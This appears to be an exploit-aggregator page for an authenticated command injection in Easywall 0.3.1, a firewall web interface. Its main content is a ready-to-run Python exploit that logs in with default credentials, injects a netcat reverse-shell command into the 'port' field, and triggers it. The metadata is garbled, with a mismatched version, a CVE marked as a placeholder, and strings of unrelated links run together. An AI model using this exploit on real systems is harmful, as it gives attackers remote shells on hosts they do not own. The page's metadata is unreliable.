header-logo
Suggest Exploit
vendor:
Easywall
by:
Melvin Mejia
6.1
CVSS
HIGH
Remote Command Execution
78
CWE
Product Name: Easywall
Affected Version From: 2000.3.1
Affected Version To: 2000.3.1
Patch Exists: NO
Related CWE: CVE-2023-XXXX (Not real CVE, placeholder)
CPE: a:easywall:easywall:0.3.1
Metasploit: https://www.rapid7.com/db/vulnerabilities/mediawiki-cve-2024-23174/https://www.rapid7.com/db/vulnerabilities/suse-cve-2022-43358/https://www.rapid7.com/db/vulnerabilities/linuxrpm-RHSA-RHEL9-unaffected/https://www.rapid7.com/db/vulnerabilities/freebsd-cve-2022-23504/https://www.rapid7.com/db/vulnerabilities/linuxrpm-RHSA-RHEL8-unaffected/https://www.rapid7.com/db/vulnerabilities/debian-cve-2017-14723/https://www.rapid7.com/db/vulnerabilities/wordpress-cve-2017-14723/https://www.rapid7.com/db/vulnerabilities/huawei-euleros-2_0_sp2-cve-2017-9788/https://www.rapid7.com/db/vulnerabilities/hpux-cve-2017-9788/https://www.rapid7.com/db/vulnerabilities/ubuntu-cve-2017-9788/https://www.rapid7.com/db/vulnerabilities/amazon_linux-cve-2017-9788/https://www.rapid7.com/db/vulnerabilities/huawei-euleros-2_0_sp1-cve-2017-9788/https://www.rapid7.com/db/vulnerabilities/redhat_linux-cve-2017-9788/https://www.rapid7.com/db/vulnerabilities/centos_linux-cve-2017-9788/https://www.rapid7.com/db/vulnerabilities/oracle_linux-cve-2017-9788/https://www.rapid7.com/db/vulnerabilities/oracle-solaris-cve-2017-9788/https://www.rapid7.com/db/vulnerabilities/ibm-http_server-cve-2017-9788/https://www.rapid7.com/db/vulnerabilities/apache-httpd-cve-2017-9788/https://www.rapid7.com/db/vulnerabilities/gentoo-linux-cve-2017-9788/https://www.rapid7.com/db/vulnerabilities/debian-cve-2017-9788/https://www.rapid7.com/db/?q=placeholder)&type=&page=2https://www.rapid7.com/db/?q=placeholder)&type=&page=2
Other Scripts: https://www.infosecmatter.com/why-your-exploit-completed-but-no-session-was-created-try-these-fixes/https://www.infosecmatter.com/nessus-plugin-library/?id=141474https://www.infosecmatter.com/nessus-plugin-library/?id=75129https://www.infosecmatter.com/nessus-plugin-library/?id=137370https://www.infosecmatter.com/nessus-plugin-library/?id=148894https://www.infosecmatter.com/nessus-plugin-library/?id=56177https://www.infosecmatter.com/nessus-plugin-library/?id=12055https://www.infosecmatter.com/metasploit-auxiliary-modules-detailed-spreadsheet/https://www.infosecmatter.com/metasploit-module-library/?mm=post/multi/escalate/aws_create_iam_userhttps://www.infosecmatter.com/nmap-nse-library/?nse=http-huawei-hg5xx-vulnhttps://www.infosecmatter.com/metasploit-module-library/?mm=auxiliary/fileformat/badpdfhttps://www.infosecmatter.com/metasploit-module-library/?mm=exploit/osx/local/feedback_assistant_roothttps://www.infosecmatter.com/metasploit-module-library/?mm=exploit/osx/local/timemachine_cmd_injectionhttps://www.infosecmatter.com/metasploit-module-library/?mm=exploit/osx/browser/safari_in_operator_side_effecthttps://www.infosecmatter.com/nessus-plugin-library/?id=146094https://www.infosecmatter.com/nessus-plugin-library/?id=155955https://www.infosecmatter.com/metasploit-module-library/?mm=post/multi/gather/unix_kerberos_ticketshttps://www.infosecmatter.com/metasploit-module-library/?mm=evasion/windows/process_herpaderpinghttps://www.infosecmatter.com/metasploit-module-library/?mm=exploit/windows/oracle/client_system_analyzer_uploadhttps://www.infosecmatter.com/metasploit-module-library/?mm=encoder/x86/opt_sub
Platforms Tested: Ubuntu 22.04
2023

Easywall 0.3.1 – Authenticated Remote Command Execution

The Easywall 0.3.1 software allows an authenticated user to execute arbitrary commands on the target system due to a command injection vulnerability in the 'port' parameter. By sending a specially crafted payload, an attacker can gain unauthorized access to the system.

Mitigation:

To mitigate this vulnerability, it is recommended to update to a patched version of the Easywall software. Additionally, input validation should be implemented to sanitize user-supplied data.
Source

Exploit-DB raw data:

# Exploit Title: Easywall 0.3.1 - Authenticated Remote Command Execution
# Date: 30-11-2023
# Exploit Author: Melvin Mejia
# Vendor Homepage: https://jpylypiw.github.io/easywall/
# Software Link: https://github.com/jpylypiw/easywall
# Version: 0.3.1
# Tested on: Ubuntu 22.04

import requests, json, urllib3
urllib3.disable_warnings()

def exploit():
    
    # Replace values needed here
    target_host = "192.168.1.25"
    target_port= "12227"
    lhost = "192.168.1.10"
    lport = "9001"
    user = "admin"
    password = "admin"
    
    target = f"https://{target_host}:{target_port}"

    # Authenticate to the app
    print("[+] Attempting login with the provided credentials...")
    login_data = {"username":user, "password":password}
    session = requests.session()
    try:
        login = session.post(f'{target}/login',data=login_data,verify=False)
    except Exception as ex:
        print("[!] There was a problem connecting to the app, error:", ex)
        exit(1)

    if login.status_code != 200:
        print("[!] Login failed.")
        exit(1)
    else:
        print("[+] Login successfull.")    
    
    # Send the payload, the port parameter suffers from a command injection vulnerability
    print("[+] Attempting to send payload.")
    rev_shell = f'/usr/bin/nc {lhost} {lport} -e bash #'
    data = {"port":f"123;{rev_shell}", "description":"","tcpudp":"tcp"}
    send_payload = session.post(f"{target}/ports-save",data=data,verify=False)
    if send_payload.status_code != 200:
        print("[!] Failed to send payload.")
        exit(1)
    else:
        print("[+] Payload sent.")

    # Trigger the execution of the payload
    print("[+] Attempting execution.")
    data = {"step_1":"", "step_2":""}
    execute = session.post(f"{target}/apply-save",data=data, verify=False)
    if execute.status_code != 200:
        print("[!] Attempt to execute failed.")
        exit(1)
    else:
        print(f"[+] Execution succeded, you should have gotten a shell at {lhost}:{lport}.")

exploit()

Navigation

Suggest Exploit

Services By CQR